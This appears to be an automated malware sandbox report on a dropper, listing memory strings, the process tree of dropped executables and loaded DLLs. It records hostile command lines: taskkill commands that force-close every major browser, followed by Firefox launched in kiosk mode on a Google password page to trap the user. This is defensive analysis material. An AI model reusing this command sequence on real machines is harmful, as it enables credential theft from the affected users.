Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECTION_SET_FLAG_USE_XP_LINE_BREAKQUERY_CONTENT_FLAG_SELECTION_FINDget isFormAssociatedCustomElementsQUERY_CONTENT_FLAG_SELECTION_ACCESSIBILITYEnterprisePolicies:AllPoliciesAppliedEXCLUDE_STACKINFO_FROM_LOADEVENTSEnterprisePolicies:DisallowedFeaturesisExemptExecutableExtension/domains<QUERY_CONTENT_FLAG_SELECTION_IME_CONVERTEDTEXTQUERY_CONTENT_FLAG_SELECTION_IME_SELECTEDRAWTEXTallowContentRetargetingOnChildrenbrowser.policies.testing.disallowEnterpriseresource://gre/modules/Console.sys.mjs@mozilla.org/mac-preferences-reader;1resource:///modules/policies/Policies.sys.mjsInvalid parameters specified for msSinceProcessStartIncludingSuspendmsSinceProcessStartExcludingSuspendresource:///modules/policies/schema.sys.mjsWebInstallerInstallAddonFromWebpageQUERY_CONTENT_FLAG_SELECTION_URLSTRIKEOUTresource://gre/modules/AddonManager.sys.mjsINCLUDE_PRIVATE_FIELDS_IN_LOADEVENTS{4399533d-08d1-458c-a87a-235f74451cfa}resource://gre/modules/Blocklist.sys.mjs{66354bc9-7ed1-4692-ae1d-8da97d6b205e}separatePrivilegedMozillaWebContentProcessextensions.abuseReport.amWebAPI.enabledQUERY_CONTENT_FLAG_SELECTION_URLSECONDARYSELECTION_SET_FLAG_USE_NATIVE_LINE_BREAKresource://gre/modules/PromiseUtils.sys.mjsareUntrustedModuleLoadEventsReadyresource://gre/modules/PromiseUtils.sys.mjsaMethod must be a non-empty stringextensions.blocklist.pingCountVersionUnregistering shutdown blocker for Async shutdown of AddonManager providersAddonListener threw exception when calling extensions.update.autoUpdateDefaultresource://gre/modules/AsyncShutdown.sys.mjsextensions.quarantinedDomains.enabledRegistering shutdown blocker for aExtraListeners must be an array or nullTEST:addon-repository-data-updatedicons must be a string, an object or nullaMimetype must be a string or nullresource://gre/modules/addons/XPIProvider.jsmextensions.webExtensionsMinPlatformVersionresource://gre/modules/AbuseReporter.sys.mjsBackground update check beginningInstallListener threw exception when calling extensions.remoteSettings.disabledresource://gre/modules/Log.sys.mjsaAppVersion must be a string or nullAsync shutdown of AddonRepositoryFailure during AddonRepository shutdownaOptions.browser must be an Element or nullFailure during wait for shutdown barrieraddons-background-update-completeextensions.systemAddon.update.enabledresource://gre/modules/Extension.sys.mjsextensions.postDownloadThirdPartyPromptisPrincipalInSitePermissionsBlocklistNS_PREFBRANCH_PREFCHANGE_TOPIC_IDSitePermsAddons can't be installedAddon download before validation.aListener must be a InstallListener objectRegistering upgrade listener for aSource must be an Element, or nullaListener must be an AddonManagerListener objectgetSitePermsAddonInstallForWebpageaBrowser must be an Element, or nullNo upgrade listener registered for addon ID: aListener must be an AddonListener objectaMimetype must be a non-empty stringInstall Failed on unexpected erroramWebAPI reportAbuse not supported@mozilla.org/addons/web-install-prompt;1No addonTypes found for p
Source: file.exe, 00000000.00000003.2127327476.0000000006152000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114591297.0000000006137000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2114370484.0000000006156000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820140579.0000000005C70000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2834013659.0000000005C78000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2834333052.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000009.00000003.2820701412.0000000005C52000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2960772552.0000000005A94000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938814641.0000000005A65000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2938365387.0000000005A84000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3044459864.0000000005E56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 42%
Source: 1664VO856PFRR45SNXLF.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 1664VO856PFRR45SNXLF.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe "C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe "C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe"
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe "C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe "C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe "C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe "C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe"
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe "C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2176 -parentBuildID 20230927232528 -prefsHandle 2112 -prefMapHandle 2100 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6837355c-621c-4577-8fde-3e4378469245} 6468 "\\.\pipe\gecko-crash-server-pipe.6468" 2592396dd10 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002711001\num.exe "C:\Users\user\AppData\Local\Temp\1002711001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4176 -parentBuildID 20230927232528 -prefsHandle 4300 -prefMapHandle 4296 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89000b5d-e12c-48b9-8974-2194eb69f6f5} 6468 "\\.\pipe\gecko-crash-server-pipe.6468" 25935f3c310 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe "C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe"
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe "C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe"
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe "C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe "C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe"
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe "C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe"
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2140 -parentBuildID 20230927232528 -prefsHandle 2060 -prefMapHandle 2044 -prefsLen 25350 -prefMapSize 238051 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {866f494e-4395-4791-8c6f-41680297a670} 7096 "\\.\pipe\gecko-crash-server-pipe.7096" 254d1e6f110 socket
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe "C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe "C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe "C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe "C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe "C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe "C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002711001\num.exe "C:\Users\user\AppData\Local\Temp\1002711001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe "C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe "C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe "C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe"
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe "C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe"
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2176 -parentBuildID 20230927232528 -prefsHandle 2112 -prefMapHandle 2100 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6837355c-621c-4577-8fde-3e4378469245} 6468 "\\.\pipe\gecko-crash-server-pipe.6468" 2592396dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4176 -parentBuildID 20230927232528 -prefsHandle 4300 -prefMapHandle 4296 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89000b5d-e12c-48b9-8974-2194eb69f6f5} 6468 "\\.\pipe\gecko-crash-server-pipe.6468" 25935f3c310 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2140 -parentBuildID 20230927232528 -prefsHandle 2060 -prefMapHandle 2044 -prefsLen 25350 -prefMapSize 238051 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {866f494e-4395-4791-8c6f-41680297a670} 7096 "\\.\pipe\gecko-crash-server-pipe.7096" 254d1e6f110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: chartv.dll Jump to behavior
